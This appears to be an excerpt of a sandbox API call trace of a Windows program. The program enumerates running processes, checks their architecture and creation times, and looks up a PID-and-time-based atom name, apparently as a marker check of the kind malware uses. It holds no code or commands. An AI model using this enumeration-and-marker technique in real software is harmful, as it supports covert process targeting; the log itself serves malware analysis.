	[0072.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.341] CloseHandle (hObject=0x224) returned 1
	[0072.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.341] CloseHandle (hObject=0x224) returned 1
	[0072.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.341] CloseHandle (hObject=0x224) returned 1
	[0072.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.342] CloseHandle (hObject=0x224) returned 1
	[0072.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.342] CloseHandle (hObject=0x224) returned 1
	[0072.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.342] CloseHandle (hObject=0x224) returned 1
	[0072.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.342] CloseHandle (hObject=0x224) returned 1
	[0072.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728978, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.343] CloseHandle (hObject=0x224) returned 1
	[0072.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.343] CloseHandle (hObject=0x224) returned 1
	[0072.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.343] CloseHandle (hObject=0x224) returned 1
	[0072.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea40, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.343] CloseHandle (hObject=0x224) returned 1
	[0072.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e888, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.343] CloseHandle (hObject=0x224) returned 1
	[0072.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.344] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.345] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.345] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.345] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.346] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetLastError () returned 0x5
	[0072.347] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.347] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.347] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.347] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.348] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.348] CloseHandle (hObject=0x224) returned 1
	[0072.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.348] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.348] CloseHandle (hObject=0x224) returned 1
	[0072.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e7e8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.348] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.348] CloseHandle (hObject=0x224) returned 1
	[0072.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772170, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16d68) returned 0xc0000004
	[0072.382] VirtualAlloc (lpAddress=0x0, dwSize=0x16e68, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16e68, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772188, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0072.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.386] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.386] CloseHandle (hObject=0x224) returned 1
	[0072.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728818, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.386] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.386] CloseHandle (hObject=0x224) returned 1
	[0072.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7288b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.387] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.387] CloseHandle (hObject=0x224) returned 1
	[0072.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.387] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.387] CloseHandle (hObject=0x224) returned 1
	[0072.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.387] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.387] CloseHandle (hObject=0x224) returned 1
